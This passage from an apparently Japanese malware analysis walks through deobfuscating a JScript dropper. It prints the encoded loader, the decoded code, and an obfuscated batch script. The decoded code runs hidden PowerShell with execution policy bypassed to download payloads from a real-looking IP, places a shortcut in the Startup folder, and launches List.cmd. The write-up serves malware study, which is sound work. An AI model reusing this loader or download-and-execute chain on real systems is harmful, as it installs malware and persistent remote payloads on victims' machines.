27%FvIeHFzy29FvIeHFzy%3BFvIeHFzy%2FvIeHFzy2%2FvIeHFzyC%2FvIeHFzy0%FvIeHFzy22FvIeHFzy%2FvIeHFzy2%FvIeHFzy2C%FvIeHFzy20FvIeHFzy%22oFvIeHFzypeFvIeHFzyn%FvIeHFzy22FvIeHFzy%2FvIeHFzyC%20%FvIeHFzy30%FvIeHFzy29FvIeHFzy%3FvIeHFzyB%FvIeHFzy0D%FvIeHFzy0AFvIeHFzyWSFvIeHFzycriFvIeHFzyptFvIeHFzy%2FvIeHFzyESFvIeHFzyleFvIeHFzyep%FvIeHFzy28%FvIeHFzy33FvIeHFzy%30FvIeHFzy%3FvIeHFzy0%3FvIeHFzy0%3FvIeHFzy0%FvIeHFzy29%3FvIeHFzyB%FvIeHFzy20FvIeHFzy%7DFvIeHFzy%0FvIeHFzyD%FvIeHFzy0A%FvIeHFzy0D%FvIeHFzy0AFvIeHFzyvaFvIeHFzyr%FvIeHFzy20FvIeHFzyfiFvIeHFzyleFvIeHFzypaFvIeHFzythbFvIeHFzy%20FvIeHFzy%3FvIeHFzyD%2FvIeHFzy0wFvIeHFzyscFvIeHFzyr%2EExpFvIeHFzyandEFvIeHFzynvFvIeHFzyiroFvIeHFzynmFvIeHFzyenFvIeHFzytSFvIeHFzytriFvIeHFzyngFvIeHFzys%2FvIeHFzy8%FvIeHFzy22%FvIeHFzy25FvIeHFzyapFvIeHFzypdFvIeHFzyatFvIeHFzya%FvIeHFzy25FvIeHFzy%2FvIeHFzy2%FvIeHFzy29FvIeHFzy%2FvIeHFzy0%2BFvIeHFzy%20%FvIeHFzy22%FvIeHFzy5C%5FvIeHFzyC%22%2FvIeHFzy0%FvIeHFzy2BFvIeHFzy%2FvIeHFzy0%FvIeHFzy22DrFvIeHFzyivFvIeHFzyerSFvIeHFzytoFvIeHFzyreLisFvIeHFzyt%2FvIeHFzyErtFvIeHFzyf%2FvIeHFzy2%FvIeHFzy3BFvIeHFzy%0DFvIeHFzy%0FvIeHFzyAvaFvIeHFzyr%FvIeHFzy20FvIeHFzyfsFvIeHFzyobFvIeHFzy%20FvIeHFzy%3DFvIeHFzy%2FvIeHFzy0nFvIeHFzyew%FvIeHFzy20FvIeHFzyActiFvIeHFzyveFvIeHFzyXOFvIeHFzybjecFvIeHFzyt%FvIeHFzy28FvIeHFzy%2FvIeHFzy2SFvIeHFzycrFvIeHFzyiptFvIeHFzyinFvIeHFzyg%2EFFvIeHFzyilFvIeHFzyeSFvIeHFzyysFvIeHFzyteFvIeHFzymObFvIeHFzyjecFvIeHFzyt%FvIeHFzy22FvIeHFzy%2FvIeHFzy9%3FvIeHFzyB%FvIeHFzy20FvIeHFzyvaFvIeHFzyr%FvIeHFzy20bbFvIeHFzy%20%3DFvIeHFzy%2FvIeHFzy0fFvIeHFzysobFvIeHFzy%2FvIeHFzyEFiFvIeHFzyleFvIeHFzyExFvIeHFzyisFvIeHFzyts%2FvIeHFzy8fFvIeHFzyilFvIeHFzyepaFvIeHFzythb%2FvIeHFzy9%FvIeHFzy3BFvIeHFzy%20FvIeHFzyif%2FvIeHFzy0%28FvIeHFzybb%2FvIeHFzy0%FvIeHFzy3D%3D%FvIeHFzy20FvIeHFzyfaFvIeHFzylsFvIeHFzye%FvIeHFzy29%FvIeHFzy20%FvIeHFzy7BFvIeHFzy%0DFvIeHFzy%0AFvIeHFzysh%2FvIeHFzyESheFvIeHFzyllFvIeHFzyExFvIeHFzyecuFvIeHFzyte%FvIeHFzy28FvIeHFzy%2FvIeHFzy2cFvIeHFzym%FvIeHFzy22FvIeHFzy%2FvIeHFzyBs%FvIeHFzy2BFvIeHFzy%22FvIeHFzyxeFvIeHFzy%22%2FvIeHFzyC%20%2FvIeHFzy2%2FcFvIeHFzy%2FvIeHFzy0powFvIeHFzyerFvIeHFzyshFvIeHFzyelFvIeHFzyl%FvIeHFzy2EexeFvIeHFzy%20%2FvIeHFzyDnFvIeHFzyopFvIeHFzyrofFvIeHFzyilFvIeHFzye%FvIeHFzy20FvIeHFzy%2FvIeHFzyDeFvIeHFzyxeFvIeHFzycutiFvIeHFzyonFvIeHFzypolFvIeHFzyicy%FvIeHFzy20byFvIeHFzypasFvIeHFzys%FvIeHFzy20FvIeHFzy%2FvIeHFzyDwFvIeHFzyinFvIeHFzydoFvIeHFzywstylFvIeHFzye%FvIeHFzy20FvIeHFzyhidFvIeHFzyden%FvIeHFzy20FvIeHFzy%28neFvIeHFzyw%2FvIeHFzyDoFvIeHFzybjeFvIeHFzyctFvIeHFzy%2FvIeHFzy0sFvIeHFzyysFvIeHFzytem%2EnFvIeHFzyet%2FvIeHFzyEwebFvIeHFzyclFvIeHFzyieFvIeHFzyntFvIeHFzy%29%FvIeHFzy2EFvIeHFzydoFvIeHFzywnFvIeHFzyloFvIeHFzyadfFvIeHFzyilFvIeHFzye%FvIeHFzy28FvIeHFzy%2FvIeHFzy7hFvIeHFzyttFvIeHFzyp%FvIeHFzy3A%2FvIeHFzyF%2F%39FvIeHFzy%31FvIeHFzy%2FvIeHFzyE%FvIeHFzy32FvIeHFzy%3FvIeHFzy4%3FvIeHFzy3%FvIeHFzy2E%3FvIeHFzy8%FvIeHFzy30%FvIeHFzy2EFvIeHFzy%38FvIeHFzy%33FvIeHFzy%2FvIeHFzyFaMFvIeHFzy%33FvIeHFzyM%FvIeHFzy35FvIeHFzytgXFvIeHFzy%3FvIeHFzy9gBFvIeHFzyQCwFvIeHFzy%37FvIeHFzyjEFvIeHFzybAFvIeHFzyA%3FvIeHFzy8LIFvIeHFzyKmwFvIeHFzyImyeFvIeHFzy%35FvIeHFzyF%2FFvIeHFzygeFvIeHFzyt%FvIeHFzy2EpFvIeHFzyhp%FvIeHFzy27%FvIeHFzy2CFvIeHFzy%27FvIeHFzy%22FvIeHFzy%2FvIeHFzyBfFvIeHFzyilFvIeHFzyepaFvIeHFzythFvIeHFzyb%2FvIeHFzyB%FvIeHFzy22%FvIeHFzy27%2FvIeHFzy9%FvIeHFzy3B%FvIeHFzy22%FvIeHFzy2C%FvIeHFzy20%2FvIeHFzy2%22%2FvIeHFzyC%FvIeHFzy20%2FvIeHFzy2opeFvIeHFzyn%2FvIeHFzy2%FvIeHFzy2C%2FvIeHFzy0%3FvIeHFzy0%2FvIeHFzy9%FvIeHFzy3B%0DFvIeHFzy%0FvIeHFzyAWFvIeHFzyScrFvIeHFzyipFvIeHFzyt%FvIeHFzy2ESFvIeHFzyleeFvIeHFzyp%28%FvIeHFzy33FvIeHFzy%3FvIeHFzy0%FvIeHFzy30%3FvIeHFzy0%FvIeHFzy30FvIeHFzy%29FvIeHFzy%3BFvIeHFzy%20%7FvIeHFzyD%FvIeHFzy0D%FvIeHFzy0A%0FvIeHFzyD%FvIeHFzy0AFvIeHFzyvarFvIeHFzy%20FvIeHFzyfiFvIeHFzyleFvIeHFzypaFvIeHFzythcFvIeHFzy%2FvIeHFzy0%3FvIeHFzyD%FvIeHFzy20FvIeHFzywsFvIeHFzycrFvIeHFzy%2FvIeHFzyEEFvIeHFzyxpFvIeHFzyanFvIeHFzydEnFvIeHFzyvirFvIeHFzyonmFvIeHFzyentFvIeHFzyStrFvIeHFzyingFvIeHFzys%FvIeHFzy28%FvIeHFzy22%FvIeHFzy25FvIeHFzyapFvIeHFzypdFvIeHFzyata%FvIeHFzy25%22%FvIeHFzy29FvIeHFzy%2FvIeHFzy0%FvIeHFzy2B%FvIeHFzy20FvIeHFzy%22%FvIeHFzy5C%5CFvIeHFzy%2FvIeHFzy2%2FvIeHFzy0%FvIeHFzy2B%FvIeHFzy20FvIeHFzy%2FvIeHFzy2ListFvIeHFzy%2FvIeHFzyEcFvIeHFzymd%22FvIeHFzy%3B%FvIeHFzy0DFvIeHFzy%0AvFvIeHFzyarFvIeHFzy%2FvIeHFzy0fsFvIeHFzyocFvIeHFzy%20FvIeHFzy%3FvIeHFzyD%2FvIeHFzy0nFvIeHFzyewFvIeHFzy%2FvIeHFzy0AFvIeHFzyctFvIeHFzyivFvIeHFzyeXObFvIeHFzyjeFvIeHFzyctFvIeHFzy%2FvIeHFzy8%FvIeHFzy22FvIeHFzyScrFvIeHFzyipFvIeHFzytiFvIeHFzyng%FvIeHFzy2EFvIeHFzyFileFvIeHFzySyFvIeHFzysteFvIeHFzymObFvIeHFzyjeFvIeHFzyct%2FvIeHFzy2%FvIeHFzy29FvIeHFzy%3BFvIeHFzy%2FvIeHFzy0vFvIeHFzyar%FvIeHFzy20FvIeHFzybc%2FvIeHFzy0%FvIeHFzy3DFvIeHFzy%20FvIeHFzyfsFvIeHFzyoc%FvIeHFzy2EFvIeHFzyFiFvIeHFzyleFvIeHFzyExFvIeHFzyistFvIeHFzys%2FvIeHFzy8fiFvIeHFzylepFvIeHFzyatFvIeHFzyhc%FvIeHFzy29FvIeHFzy%3B%FvIeHFzy20FvIeHFzyif%FvIeHFzy20FvIeHFzy%28bc%20FvIeHFzy%3D%3D%FvIeHFzy20FvIeHFzyfalsFvIeHFzye%29%FvIeHFzy20%FvIeHFzy7BFvIeHFzy%0FvIeHFzyD%0FvIeHFzyAshFvIeHFzy%2FvIeHFzyESFvIeHFzyheFvIeHFzyllEFvIeHFzyxeFvIeHFzycuFvIeHFzyteFvIeHFzy%2FvIeHFzy8%FvIeHFzy22FvIeHFzycm%2FvIeHFzy2%2Bs%2FvIeHFzyB%22FvIeHFzyxe%22FvIeHFzy%2C%FvIeHFzy20FvIeHFzy%2FvIeHFzy2%FvIeHFzy2FFvIeHFzyc%FvIeHFzy20poFvIeHFzywerFvIeHFzyshFvIeHFzyellFvIeHFzy%2FvIeHFzyEexFvIeHFzye%FvIeHFzy20FvIeHFzy%2FvIeHFzyDnoFvIeHFzyproFvIeHFzyfiFvIeHFzyle%2FvIeHFzy0%FvIeHFzy2DeFvIeHFzyxeFvIeHFzycutFvIeHFzyionpFvIeHFzyolFvIeHFzyicFvIeHFzyy%FvIeHFzy20FvIeHFzybyFvIeHFzypassFvIeHFzy%2FvIeHFzy0%FvIeHFzy2DwFvIeHFzyindoFvIeHFzywstFvIeHFzyyleFvIeHFzy%2FvIeHFzy0hFvIeHFzyidFvIeHFzyden%FvIeHFzy20%FvIeHFzy28nFvIeHFzyewFvIeHFzy%2DFvIeHFzyobjeFvIeHFzyct%FvIeHFzy20FvIeHFzysyFvIeHFzystFvIeHFzyem%2FvIeHFzyEneFvIeHFzyt%2FvIeHFzyEwebFvIeHFzyclFvIeHFzyieFvIeHFzyntFvIeHFzy%2FvIeHFzy9%2FvIeHFzyEdFvIeHFzyowFvIeHFzynlFvIeHFzyoaFvIeHFzydfFvIeHFzyile%2FvIeHFzy8%FvIeHFzy27FvIeHFzyhtFvIeHFzytp%3FvIeHFzyA%2FvIeHFzyF%FvIeHFzy2F%39%31%FvIeHFzy2E%3FvIeHFzy2%FvIeHFzy34FvIeHFzy%3FvIeHFzy3%FvIeHFzy2E%FvIeHFzy38FvIeHFzy%3FvIeHFzy0%FvIeHFzy2E%3FvIeHFzy8%FvIeHFzy33FvIeHFzy%2FvIeHFzyFaFvIeHFzyM%FvIeHFzy33M%3FvIeHFzy5tFvIeHFzygXFvIeHFzy%39gFvIeHFzyBQCwFvIeHFzy%3FvIeHFzy7jFvIeHFzyEbAFvIeHFzyA%FvIeHFzy38LFvIeHFzyIKmFvIeHFzywIFvIeHFzymyFvIeHFzye%35FFvIeHFzy%2FvIeHFzyFLiFvIeHFzyst%FvIeHFzy2EFvIeHFzycmdFvIeHFzy%2FvIeHFzy7%FvIeHFzy2CFvIeHFzy%2FvIeHFzy7%FvIeHFzy22FvIeHFzy%2FvIeHFzyBfiFvIeHFzyleFvIeHFzypaFvIeHFzythcFvIeHFzy%2FvIeHFzyB%FvIeHFzy22%FvIeHFzy27%2FvIeHFzy9%FvIeHFzy3B%FvIeHFzy22FvIeHFzy%2FvIeHFzyC%FvIeHFzy20FvIeHFzy%2FvIeHFzy2%FvIeHFzy22FvIeHFzy%2FvIeHFzyC%FvIeHFzy20FvIeHFzy%22oFvIeHFzypeFvIeHFzyn%22%2CFvIeHFzy%20%FvIeHFzy30FvIeHFzy%2FvIeHFzy9%FvIeHFzy3B%FvIeHFzy0DFvIeHFzy%0FvIeHFzyAWScrFvIeHFzyiptFvIeHFzy%2FvIeHFzyESFvIeHFzyleFvIeHFzyepFvIeHFzy%2FvIeHFzy8%3FvIeHFzy3%FvIeHFzy30%30FvIeHFzy%3FvIeHFzy0%FvIeHFzy30FvIeHFzy%29%3BFvIeHFzy%2FvIeHFzy0%FvIeHFzy7D%FvIeHFzy0DFvIeHFzy%0A%FvIeHFzy0DFvIeHFzy%0FvIeHFzyAsFvIeHFzyh%FvIeHFzy2EFvIeHFzyShFvIeHFzyellFvIeHFzyExeFvIeHFzycutFvIeHFzye%28fFvIeHFzyileFvIeHFzypatFvIeHFzyhcFvIeHFzy%2FvIeHFzyC%FvIeHFzy20%FvIeHFzy22FvIeHFzy%2FvIeHFzy2%FvIeHFzy2CFvIeHFzy%2FvIeHFzy0%FvIeHFzy22FvIeHFzy%2FvIeHFzy2%2CFvIeHFzy%20FvIeHFzy%2FvIeHFzy2oFvIeHFzypeFvIeHFzyn%2FvIeHFzy2%FvIeHFzy2C%20FvIeHFzy%3FvIeHFzy0%29%3B%2FvIeHFzy0%FvIeHFzy7DFvIeHFzy"));';
800 | var WshShell = WScript.CreateObject("WScript.Shell");
801 | WshShell.RegWrite("HKCU\\Software\\SeX\\KEx\\", "mAX", "REG_SZ");
802 | var hey = WshShell.RegRead("HKCU\\Software\\SeX\\KEx\\");
803 | if (hey == "mAX") {
804 | var AkbKzqlhIgxSrcw = RegExp("FvIeHFzy", "g")
805 | }
806 | var kxSaQcTfALZRywovGMI = LHYEGrjIgNJTPWk.replace(AkbKzqlhIgxSrcw, "");
807 | BWTYycgkPSJHutfCpj = eval(kxSaQcTfALZRywovGMI);
808 | ```
809 |
810 | `HKCU\\Software\\SeX\\KEx\\` というレジストリに値を書き込んで、書き込みが成功してる場合はデータを復号し、evalしています。レジストリを操作する処理を全てコメントアウトし、evalをconsole.logにして実行すると、以下のようなコードが手に入ります。
811 |
812 | ```javascript
813 | eval(unescape("try%20%7B%20setTimeout%28%22%22%2C%33%33%33%29%3B%20%7D%20catch%28f%29%20%7B%20var%20s%20%3D%20%22D%2EE%22%3B%0D%0Avar%20sh%20%3D%20new%20ActiveXObject%28%22shell%2Eapplication%22%29%3B%20var%20wscr%20%3D%20new%20ActiveXObject%28%22WScript%2EShell%22%29%3B%0D%0A%0D%0Avar%20filepath%20%3D%20wscr%2ESpecialFolders%28%22Startup%22%29%2B%22%5C%5C%22%2B%22desktop%2Eini%2Elnk%22%3B%0D%0Avar%20fso%20%3D%20new%20ActiveXObject%28%22Scripting%2EFileSystemObject%22%29%3B%20var%20b%20%3D%20fso%2EFileExists%28filepath%29%3B%20if%20%28b%20%3D%3D%20false%29%20%7B%0D%0Ash%2EShellExecute%28%22cm%22%2Bs%2B%22xe%22%2C%20%22%2Fc%20powershell%2Eexe%20%2Dnoprofile%20%2Dexecutionpolicy%20bypass%20%2Dwindowstyle%20hidden%20%28new%2Dobject%20system%2Enet%2Ewebclient%29%2Edownloadfile%28%27http%3A%2F%2F%39%31%2E%32%34%33%2E%38%30%2E%38%33%2FaM%33M%35tgX%39gBQCw%37jEbAA%38LIKmwImye%35F%2Fdesktop%2Eini%2Edownload%27%2C%27%22%2Bfilepath%2B%22%27%29%3B%22%2C%20%22%22%2C%20%22open%22%2C%20%30%29%3B%20%7D%0D%0A%0D%0Avar%20filepatha%20%3D%20wscr%2EExpandEnvironmentStrings%28%22%25appdata%25%22%29%20%2B%20%22%5C%5C%22%20%2B%20%22%37za%2Eexe%22%3B%0D%0Avar%20fsoa%20%3D%20new%20ActiveXObject%28%22Scripting%2EFileSystemObject%22%29%3B%20var%20ba%20%3D%20fsoa%2EFileExists%28filepatha%29%3B%20if%20%28ba%20%3D%3D%20false%29%20%7B%0D%0Ash%2EShellExecute%28%22cm%22%2Bs%2B%22xe%22%2C%20%22%2Fc%20powershell%2Eexe%20%2Dnoprofile%20%2Dexecutionpolicy%20bypass%20%2Dwindowstyle%20hidden%20%28new%2Dobject%20system%2Enet%2Ewebclient%29%2Edownloadfile%28%27http%3A%2F%2F%39%31%2E%32%34%33%2E%38%30%2E%38%33%2FaM%33M%35tgX%39gBQCw%37jEbAA%38LIKmwImye%35F%2F%37za%2Eexe%27%2C%27%22%2Bfilepatha%2B%22%27%29%3B%22%2C%20%22%22%2C%20%22open%22%2C%20%30%29%3B%0D%0AWScript%2ESleep%28%33%30%30%30%30%29%3B%20%7D%0D%0A%0D%0Avar%20filepathb%20%3D%20wscr%2EExpandEnvironmentStrings%28%22%25appdata%25%22%29%20%2B%20%22%5C%5C%22%20%2B%20%22DriverStoreList%2Ertf%22%3B%0D%0Avar%20fsob%20%3D%20new%20ActiveXObject%28%22Scripting%2EFileSystemObject%22%29%3B%20var%20bb%20%3D%20fsob%2EFileExists%28filepathb%29%3B%20if%20%28bb%20%3D%3D%20false%29%20%7B%0D%0Ash%2EShellExecute%28%22cm%22%2Bs%2B%22xe%22%2C%20%22%2Fc%20powershell%2Eexe%20%2Dnoprofile%20%2Dexecutionpolicy%20bypass%20%2Dwindowstyle%20hidden%20%28new%2Dobject%20system%2Enet%2Ewebclient%29%2Edownloadfile%28%27http%3A%2F%2F%39%31%2E%32%34%33%2E%38%30%2E%38%33%2FaM%33M%35tgX%39gBQCw%37jEbAA%38LIKmwImye%35F%2Fget%2Ephp%27%2C%27%22%2Bfilepathb%2B%22%27%29%3B%22%2C%20%22%22%2C%20%22open%22%2C%20%30%29%3B%0D%0AWScript%2ESleep%28%33%30%30%30%30%29%3B%20%7D%0D%0A%0D%0Avar%20filepathc%20%3D%20wscr%2EExpandEnvironmentStrings%28%22%25appdata%25%22%29%20%2B%20%22%5C%5C%22%20%2B%20%22List%2Ecmd%22%3B%0D%0Avar%20fsoc%20%3D%20new%20ActiveXObject%28%22Scripting%2EFileSystemObject%22%29%3B%20var%20bc%20%3D%20fsoc%2EFileExists%28filepathc%29%3B%20if%20%28bc%20%3D%3D%20false%29%20%7B%0D%0Ash%2EShellExecute%28%22cm%22%2Bs%2B%22xe%22%2C%20%22%2Fc%20powershell%2Eexe%20%2Dnoprofile%20%2Dexecutionpolicy%20bypass%20%2Dwindowstyle%20hidden%20%28new%2Dobject%20system%2Enet%2Ewebclient%29%2Edownloadfile%28%27http%3A%2F%2F%39%31%2E%32%34%33%2E%38%30%2E%38%33%2FaM%33M%35tgX%39gBQCw%37jEbAA%38LIKmwImye%35F%2FList%2Ecmd%27%2C%27%22%2Bfilepathc%2B%22%27%29%3B%22%2C%20%22%22%2C%20%22open%22%2C%20%30%29%3B%0D%0AWScript%2ESleep%28%33%30%30%30%30%29%3B%20%7D%0D%0A%0D%0Ash%2EShellExecute%28filepathc%2C%20%22%22%2C%20%22%22%2C%20%22open%22%2C%20%30%29%3B%20%7D"));
814 | ```
815 |
816 | 再びevalしているので、デコードして整形すると以下のようになります。
817 |
818 | ```javascript
819 | try { setTimeout("", 333); } catch (f) {
820 | var sh = new ActiveXObject("shell.application"); var wscr = new ActiveXObject("WScript.Shell");
821 |
822 | var filepath = wscr.SpecialFolders("Startup") + "\\desktop.ini.lnk";
823 | var fso = new ActiveXObject("Scripting.FileSystemObject"); var b = fso.FileExists(filepath); if (b == false) {
824 | sh.ShellExecute("cmD.Exe", "/c powershell.exe -noprofile -executionpolicy bypass -windowstyle hidden (new-object system.net.webclient).downloadfile('http[:]//91.243.80.83/aM3M5tgX9gBQCw7jEbAA8LIKmwImye5F/desktop.ini.download','" + filepath + "');", "", "open", 0);
825 | }
826 |
827 | var filepatha = wscr.ExpandEnvironmentStrings("%appdata%") + "\\7za.exe";
828 | var fsoa = new ActiveXObject("Scripting.FileSystemObject"); var ba = fsoa.FileExists(filepatha); if (ba == false) {
829 | sh.ShellExecute("cmD.Exe", "/c powershell.exe -noprofile -executionpolicy bypass -windowstyle hidden (new-object system.net.webclient).downloadfile('http[:]//91.243.80.83/aM3M5tgX9gBQCw7jEbAA8LIKmwImye5F/7za.exe','" + filepatha + "');", "", "open", 0);
830 | WScript.Sleep(30000);
831 | }
832 |
833 | var filepathb = wscr.ExpandEnvironmentStrings("%appdata%") + "\\DriverStoreList.rtf";
834 | var fsob = new ActiveXObject("Scripting.FileSystemObject"); var bb = fsob.FileExists(filepathb); if (bb == false) {
835 | sh.ShellExecute("cmD.Exe", "/c powershell.exe -noprofile -executionpolicy bypass -windowstyle hidden (new-object system.net.webclient).downloadfile('http[:]//91.243.80.83/aM3M5tgX9gBQCw7jEbAA8LIKmwImye5F/get.php','" + filepathb + "');", "", "open", 0);
836 | WScript.Sleep(30000);
837 | }
838 |
839 | var filepathc = wscr.ExpandEnvironmentStrings("%appdata%") + "\\List.cmd";
840 | var fsoc = new ActiveXObject("Scripting.FileSystemObject"); var bc = fsoc.FileExists(filepathc); if (bc == false) {
841 | sh.ShellExecute("cmD.Exe", "/c powershell.exe -noprofile -executionpolicy bypass -windowstyle hidden (new-object system.net.webclient).downloadfile('http[:]//91.243.80.83/aM3M5tgX9gBQCw7jEbAA8LIKmwImye5F/List.cmd','" + filepathc + "');", "", "open", 0);
842 | WScript.Sleep(30000);
843 | }
844 |
845 | sh.ShellExecute(filepathc, "", "", "open", 0);
846 | }
847 | ```
848 |
849 | Powershell経由で、4つのファイルをダウンロードしています。
850 |
851 | ```
852 | - desktop.ini.lnk
853 | - 7za.exe
854 | - DriverStoreList.rtf
855 | - List.cmd
856 | ```
857 |
858 | `desktop.ini.lnk` だけスタートアップのディレクトリに配置しますが、私達がダウンロードを試みた際には404で、データを手に入れることは出来ませんでした。それ以外の3つのファイルは `AppData` ディレクトリに配置されます。 `7za.exe` は7zipの正規のプログラムです。 `DriverStoreList.rtf` が7zで暗号化圧縮されたファイル。 `List.cmd` は難読化されており、以下のようになっていました。
859 |
860 | ```batch
861 | @echo off
862 | @chcp 1251
863 | set dltpamgqdczxczx=c
864 | set fkknkskjqjzxczx=R
865 | set xkvioggnhazxczx=k
866 | set ztqaprhfdgzxczx=V
867 | set venpnkfmskzxczx=m
868 | set zqosobjskhzxczx=e
869 | set kcjzzfajhkzxczx=I
870 | set ftqfsivfhvzxczx=W
871 | set vhjgjvyvwnzxczx=o
872 | set nzpiuqnppfzxczx=Z
873 | set vafljksjhzzxczx=G
874 | set zhjwejygppzxczx=J
875 | set dkgjdfntngzxczx=U
876 | set jftgcozzcpzxczx=Y
877 | set pejajwqiffzxczx=g
878 | set ivismnzvnozxczx=E
879 | set eejdhaacxgzxczx=S
880 | set czzyfhrwhvzxczx=v
881 | set suyfjqgajhzxczx=a
882 | set xgxdxqaviezxczx=p
883 | set fpwjhnpptjzxczx=T
884 | set ehschesznazxczx=F
885 | set agquyfuaufzxczx=l
886 | set cvrwbchrsjzxczx=X
887 | set cjdghpyhbjzxczx=b
888 | set kldjfjsqpdzxczx=Q
889 | set jygabrjhcyzxczx=z
890 | set yksanbcfaszxczx=n
891 | set zaqwgffggpzxczx=D
892 | set ebddhwgwapzxczx=A
893 | set dpepwqucghzxczx=M
894 | set ewnnrnsntuzxczx=H
895 | set uehjhfvjhfzxczx=x
896 | set uxxuqqksskzxczx=d
897 | set gggibjshxxzxczx=s
898 | set rjfkgkrrkwzxczx=C
899 | set vvkkkaaiejzxczx=w
900 | set sppbbmdjhdzxczx=B
901 | set uyhhhakakazxczx=q
902 | set kadfjeiiifzxczx=j
903 | set zzyjgjaautzxczx=O
904 | set qqudvhbnejzxczx=y
905 | set dpgdofjwndzxczx=h
906 | set nvjsjhwqhazxczx=t
907 | set dgiaetdkhgzxczx=f
908 | set jgwjhbajhvzxczx=u
909 | set vbgiogjsbgzxczx=i
910 | set hxyegahajvzxczx=P
911 | set hehshgjgjszxczx=K
912 | set bhhhpfpdkdzxczx=r
913 | set kaagkkkfjezxczx=L
914 | set hcffffrhsgzxczx=N
915 | %nvjsjhwqhazxczx%%suyfjqgajhzxczx%%gggibjshxxzxczx%%xkvioggnhazxczx%%xkvioggnhazxczx%%vbgiogjsbgzxczx%%agquyfuaufzxczx%%agquyfuaufzxczx% /%kcjzzfajhkzxczx%%dpepwqucghzxczx% %dltpamgqdczxczx%%agquyfuaufzxczx%%vbgiogjsbgzxczx%%zqosobjskhzxczx%%yksanbcfaszxczx%%nvjsjhwqhazxczx%32.%zqosobjskhzxczx%%uehjhfvjhfzxczx%%zqosobjskhzxczx% /%ehschesznazxczx%
916 | %xgxdxqaviezxczx%%vbgiogjsbgzxczx%%yksanbcfaszxczx%%pejajwqiffzxczx% -%yksanbcfaszxczx% 1 127.0.0.1 > %yksanbcfaszxczx%%jgwjhbajhvzxczx%%agquyfuaufzxczx%
917 | "%AppData%\7%jygabrjhcyzxczx%%suyfjqgajhzxczx%.%zqosobjskhzxczx%%uehjhfvjhfzxczx%%zqosobjskhzxczx%" %uehjhfvjhfzxczx% -%xgxdxqaviezxczx%%fkknkskjqjzxczx%%dgiaetdkhgzxczx%%nvjsjhwqhazxczx%%uxxuqqksskzxczx%%czzyfhrwhvzxczx%%nvjsjhwqhazxczx%%dpgdofjwndzxczx%%uxxuqqksskzxczx%%dgiaetdkhgzxczx%%bhhhpfpdkdzxczx%%pejajwqiffzxczx%%gggibjshxxzxczx%%xgxdxqaviezxczx%%gggibjshxxzxczx%%dgiaetdkhgzxczx%%zqosobjskhzxczx%%vhjgjvyvwnzxczx%%dgiaetdkhgzxczx%%uxxuqqksskzxczx%%uyhhhakakazxczx%%nvjsjhwqhazxczx%%uxxuqqksskzxczx%%kadfjeiiifzxczx%%zqosobjskhzxczx%%dgiaetdkhgzxczx%%nvjsjhwqhazxczx%%pejajwqiffzxczx% -%qqudvhbnejzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%%kaagkkkfjezxczx%%vbgiogjsbgzxczx%%gggibjshxxzxczx%%nvjsjhwqhazxczx%.%bhhhpfpdkdzxczx%%nvjsjhwqhazxczx%%dgiaetdkhgzxczx%" -%vhjgjvyvwnzxczx%"%AppData%"
918 | %gggibjshxxzxczx%%nvjsjhwqhazxczx%%suyfjqgajhzxczx%%bhhhpfpdkdzxczx%%nvjsjhwqhazxczx% "%dltpamgqdczxczx%%agquyfuaufzxczx%%vbgiogjsbgzxczx%%zqosobjskhzxczx%%yksanbcfaszxczx%%nvjsjhwqhazxczx%32.%zqosobjskhzxczx%%uehjhfvjhfzxczx%%zqosobjskhzxczx%" "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%dltpamgqdczxczx%%agquyfuaufzxczx%%vbgiogjsbgzxczx%%zqosobjskhzxczx%%yksanbcfaszxczx%%nvjsjhwqhazxczx%32.%zqosobjskhzxczx%%uehjhfvjhfzxczx%%zqosobjskhzxczx%"
919 | %nvjsjhwqhazxczx%%suyfjqgajhzxczx%%gggibjshxxzxczx%%xkvioggnhazxczx%%xkvioggnhazxczx%%vbgiogjsbgzxczx%%agquyfuaufzxczx%%agquyfuaufzxczx% /%kcjzzfajhkzxczx%%dpepwqucghzxczx% %bhhhpfpdkdzxczx%%jgwjhbajhvzxczx%%yksanbcfaszxczx%%uxxuqqksskzxczx%%agquyfuaufzxczx%%agquyfuaufzxczx%32.%zqosobjskhzxczx%%uehjhfvjhfzxczx%%zqosobjskhzxczx% /%ehschesznazxczx%
920 | %xgxdxqaviezxczx%%vbgiogjsbgzxczx%%yksanbcfaszxczx%%pejajwqiffzxczx% -%yksanbcfaszxczx% 1 127.0.0.1 > %yksanbcfaszxczx%%jgwjhbajhvzxczx%%agquyfuaufzxczx%
921 | %nvjsjhwqhazxczx%%suyfjqgajhzxczx%%gggibjshxxzxczx%%xkvioggnhazxczx%%xkvioggnhazxczx%%vbgiogjsbgzxczx%%agquyfuaufzxczx%%agquyfuaufzxczx% /%kcjzzfajhkzxczx%%dpepwqucghzxczx% %bhhhpfpdkdzxczx%%jgwjhbajhvzxczx%%yksanbcfaszxczx%%uxxuqqksskzxczx%%agquyfuaufzxczx%%agquyfuaufzxczx%32.%zqosobjskhzxczx%%uehjhfvjhfzxczx%%zqosobjskhzxczx% /%ehschesznazxczx%
